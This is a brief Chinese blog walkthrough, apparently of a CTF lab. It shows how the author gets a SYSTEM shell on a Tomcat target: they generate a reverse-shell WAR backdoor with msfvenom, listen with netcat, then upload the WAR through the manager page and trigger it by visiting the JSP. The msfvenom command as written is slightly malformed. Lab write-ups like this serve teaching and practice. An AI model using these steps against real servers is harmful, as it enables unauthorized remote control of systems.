另一种方法

上一次
拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录
另一种方法_第1张图片
这里显示能上传一个.war文件,我用msfvenom生成一个war的后门

msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545

payload.war

这次不用metasploit,改用netcat侦听4545端口
另一种方法_第2张图片

然后将生成的payload.war用jar分离出.jsp
文件:
jar -xvf payload.war

另一种方法_第3张图片
将payload.war上传到靶机,运行
deploy,网页跳转,另一种方法_第4张图片
访问
http://192.168.0.104:8282/payload/cugxcageiouu.jsp来激活payload

nc侦听那边已经显示拿到shell了,whoami查一下,还是system权限


另一种方法_第5张图片
所以可以来猎杀那些flag了

不过nc的shell远不如meterpreter方便

你可能感兴趣的:(安全)